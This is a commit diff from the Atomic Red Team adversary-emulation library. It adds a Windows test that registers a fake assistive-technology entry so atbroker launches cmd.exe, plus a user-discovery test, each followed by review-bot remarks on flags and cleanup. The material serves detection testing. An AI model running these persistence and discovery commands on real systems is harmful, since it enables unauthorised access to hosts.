Commit
Generated docs from job=generate-docs branch=master [ci skip]
Atomic Red Team doc generator committed Jan 20, 2024
1 parent e9ab27e commit f6fc008
Showing 10 changed files with 208 additions and 2 deletions.

Large diffs are not rendered by default.

Large diffs are not rendered by default.

3 changes: 3 additions & 0 deletions atomics/Indexes/Indexes-CSV/index.csv
@@ -722,6 +722,7 @@ privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution O
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
@@ -1069,6 +1070,7 @@ persistence,T1546.012,Event Triggered Execution: Image File Execution Options In
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -1543,6 +1545,7 @@ discovery,T1033,System Owner/User Discovery,3,Find computers where user has sess
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
discovery,T1033,System Owner/User Discovery,7,System Owner/User Discovery Using Command Prompt,35b88076-7edb-4eb5-bdc5-11ede7f45c6a,command_prompt
discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
3 changes: 3 additions & 0 deletions atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -487,6 +487,7 @@ privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution O
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
@@ -720,6 +721,7 @@ persistence,T1546.012,Event Triggered Execution: Image File Execution Options In
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbroker.exe (AT) Executes Arbitrary Command via Registry Key,444ff124-4c83-4e28-8df6-6efd3ece6bd4,command_prompt
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -1014,6 +1016,7 @@ discovery,T1033,System Owner/User Discovery,3,Find computers where user has sess
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
discovery,T1033,System Owner/User Discovery,7,System Owner/User Discovery Using Command Prompt,35b88076-7edb-4eb5-bdc5-11ede7f45c6a,command_prompt
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
3 changes: 3 additions & 0 deletions atomics/Indexes/Indexes-Markdown/index.md
@@ -962,6 +962,7 @@
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
@@ -1458,6 +1459,7 @@
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -2171,6 +2173,7 @@
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
- Atomic Test #6: System Discovery - SocGholish whoami [windows]
- Atomic Test #7: System Owner/User Discovery Using Command Prompt [windows]
- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
- Atomic Test #1: Container and ResourceDiscovery [containers]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
3 changes: 3 additions & 0 deletions atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -671,6 +671,7 @@
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
@@ -1008,6 +1009,7 @@
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- Atomic Test #4: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key [windows]
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -1500,6 +1502,7 @@
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
- Atomic Test #6: System Discovery - SocGholish whoami [windows]
- Atomic Test #7: System Owner/User Discovery Using Command Prompt [windows]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1615 Group Policy Discovery](../../T1615/T1615.md)
59 changes: 59 additions & 0 deletions atomics/Indexes/index.yaml
@@ -37866,6 +37866,24 @@ privilege-escalation:
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
name: command_prompt
elevation_required: true
- name: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
auto_generated_guid: 444ff124-4c83-4e28-8df6-6efd3ece6bd4
description: 'Executes code specified in the registry for a new AT (Assistive
Technologies).

'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
atbroker /start malware_test
cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"

'
name: command_prompt
T1055.004:
technique:
x_mitre_platforms:
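Review bot: the new Atbroker entry has no `elevation_required: true`, yet all three `reg add` lines write under `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs`, and the sticky-keys test directly above it in this same block does declare `elevation_required: true`; without the flag the framework will not warn an unelevated operator, and the `reg add` calls simply fail with access denied. The `cleanup_command` also runs `reg delete` without `/f`, so it stops on an interactive "Delete the registry key ... (Yes/No)?" prompt in a non-interactive run; `reg delete "HKLM\...\ATs\malware_test" /f` is the usual form. Since index.yaml is generated, both fixes belong in the T1546.008 source atomic the generator reads, not in this file.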
@@ -60126,6 +60144,24 @@ persistence:
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
name: command_prompt
elevation_required: true
- name: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
auto_generated_guid: 444ff124-4c83-4e28-8df6-6efd3ece6bd4
description: 'Executes code specified in the registry for a new AT (Assistive
Technologies).

'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
atbroker /start malware_test
cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"

'
name: command_prompt
T1136.002:
technique:
modified: '2023-10-16T17:36:37.600Z'
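Review bot: same two issues as the privilege-escalation copy of this test above (no `elevation_required: true` despite the HKLM writes, and a `reg delete` cleanup with no `/f`). One further cleanup gap applies to both copies: `atbroker /start malware_test` launches the `StartEXE` target, `C:\WINDOWS\system32\cmd.exe`, and deleting the registry key does not end that process, so a completed test leaves a live cmd.exe on the host until someone closes it. Worth adding a step that terminates it so the host is returned to its pre-test state.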
@@ -91616,6 +91652,29 @@ discovery:

'
name: powershell
- name: System Owner/User Discovery Using Command Prompt
auto_generated_guid: 35b88076-7edb-4eb5-bdc5-11ede7f45c6a
description: Identify the system owner or current user using native Windows
command prompt utilities.
supported_platforms:
- windows
input_arguments:
output_file_path:
description: Location of output file.
type: string
default: "$env:temp"
executor:
name: command_prompt
elevation_required: false
command: |
set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
cleanup_command: 'del #{output_file_path}\\user_info_*.tmp

'
T1613:
technique:
modified: '2023-04-15T16:08:50.706Z'
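Review bot: `default: "$env:temp"` for `output_file_path` is a PowerShell expression while the executor is `command_prompt`; the framework expands input-argument values as PowerShell strings before substitution, so the test works through Invoke-AtomicTest, but anyone pasting `set file=#{output_file_path}\user_info_%random%.tmp` into a plain cmd session gets a literal `$env:temp` path and every redirect fails, so `%TEMP%` would be the executor-native default. The cleanup also spells the path as `#{output_file_path}\\user_info_*.tmp` with a doubled backslash while the attack command uses a single one; cmd tolerates it, but the two should match. Both changes belong in the T1033 source atomic, since this file is generated.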
59 changes: 59 additions & 0 deletions atomics/Indexes/windows-index.yaml
@@ -31293,6 +31293,24 @@ privilege-escalation:
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
name: command_prompt
elevation_required: true
- name: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
auto_generated_guid: 444ff124-4c83-4e28-8df6-6efd3ece6bd4
description: 'Executes code specified in the registry for a new AT (Assistive
Technologies).

'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
atbroker /start malware_test
cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"

'
name: command_prompt
T1055.004:
technique:
x_mitre_platforms:
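Review bot: this is the generated duplicate of the index.yaml entry, so the same fixes apply once made in the source atomic: `elevation_required: true` for the HKLM writes, and `/f` on the `reg delete` in `cleanup_command`.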
@@ -49749,6 +49767,24 @@ persistence:
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
name: command_prompt
elevation_required: true
- name: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
auto_generated_guid: 444ff124-4c83-4e28-8df6-6efd3ece6bd4
description: 'Executes code specified in the registry for a new AT (Assistive
Technologies).

'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
atbroker /start malware_test
cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"

'
name: command_prompt
T1136.002:
technique:
modified: '2023-10-16T17:36:37.600Z'
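Review bot: duplicate of the persistence entry in index.yaml; the missing `elevation_required`, the `reg delete` without `/f`, and the cmd.exe left running by `atbroker /start malware_test` all carry over here unchanged.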
@@ -75054,6 +75090,29 @@ discovery:

'
name: powershell
- name: System Owner/User Discovery Using Command Prompt
auto_generated_guid: 35b88076-7edb-4eb5-bdc5-11ede7f45c6a
description: Identify the system owner or current user using native Windows
command prompt utilities.
supported_platforms:
- windows
input_arguments:
output_file_path:
description: Location of output file.
type: string
default: "$env:temp"
executor:
name: command_prompt
elevation_required: false
command: |
set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
cleanup_command: 'del #{output_file_path}\\user_info_*.tmp

'
T1613:
technique:
modified: '2023-04-15T16:08:50.706Z'
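Review bot: duplicate of the T1033 entry in index.yaml; the `$env:temp` default under a `command_prompt` executor and the `\\` in `cleanup_command` are the same points as there.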
39 changes: 39 additions & 0 deletions atomics/T1033/T1033.md
@@ -20,6 +20,8 @@ On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T10

- [Atomic Test #6 - System Discovery - SocGholish whoami](#atomic-test-6---system-discovery---socgholish-whoami)

- [Atomic Test #7 - System Owner/User Discovery Using Command Prompt](#atomic-test-7---system-owneruser-discovery-using-command-prompt)


<br/>

@@ -239,4 +241,41 @@ Remove-Item -Path #{output_path}\rad*.tmp -Force



<br/>
<br/>

## Atomic Test #7 - System Owner/User Discovery Using Command Prompt
Identify the system owner or current user using native Windows command prompt utilities.

**Supported Platforms:** Windows


**auto_generated_guid:** 35b88076-7edb-4eb5-bdc5-11ede7f45c6a





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file_path | Location of output file. | string | $env:temp|


#### Attack Commands: Run with `command_prompt`!


```cmd
set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
```






<br/>
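Review bot: the rendered test has no `#### Cleanup Commands:` section, although the matching entry in atomics/Indexes/index.yaml carries a `cleanup_command` (`del #{output_file_path}\\user_info_*.tmp`) and the T1546.008.md hunk in this same commit does render its cleanup block; the hunk covers the whole of the new 41 lines, so the section is genuinely absent rather than cut off. Check whether the generator dropped it or whether the source atomic places `cleanup_command` where the template does not pick it up. As rendered, a reader of the markdown has no indication that the test leaves `user_info_*.tmp` files in the output directory.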
37 changes: 37 additions & 0 deletions atomics/T1546.008/T1546.008.md
@@ -24,6 +24,8 @@ Other accessibility features exist that may also be leveraged in a similar fashi

- [Atomic Test #3 - Create Symbolic Link From osk.exe to cmd.exe](#atomic-test-3---create-symbolic-link-from-oskexe-to-cmdexe)

- [Atomic Test #4 - Atbroker.exe (AT) Executes Arbitrary Command via Registry Key](#atomic-test-4---atbrokerexe-at-executes-arbitrary-command-via-registry-key)


<br/>

@@ -162,4 +164,39 @@ icacls %windir%\system32\osk.exe /grant:r Administrators:RX



<br/>
<br/>

## Atomic Test #4 - Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
Executes code specified in the registry for a new AT (Assistive Technologies).

**Supported Platforms:** Windows


**auto_generated_guid:** 444ff124-4c83-4e28-8df6-6efd3ece6bd4






#### Attack Commands: Run with `command_prompt`!


```cmd
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe
atbroker /start malware_test
```

#### Cleanup Commands:
```cmd
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
```





<br/>
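Review bot: the `#### Attack Commands` heading carries no elevation-required marker, which matches the missing `elevation_required` in the YAML, but every line in the block writes to HKLM, so a reader following this page unelevated will see all three `reg add` calls fail; the marker will appear here once the source atomic declares `elevation_required: true`. The Cleanup Commands block also needs `/f` on `reg delete` to avoid the interactive confirmation prompt, and nothing in it ends the cmd.exe that `atbroker /start malware_test` launches. A one-line note in the description that the test creates a new AT entry named `malware_test` and starts cmd.exe through it would also help defenders map the expected registry write and process-creation events when they run it.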

0 comments on commit f6fc008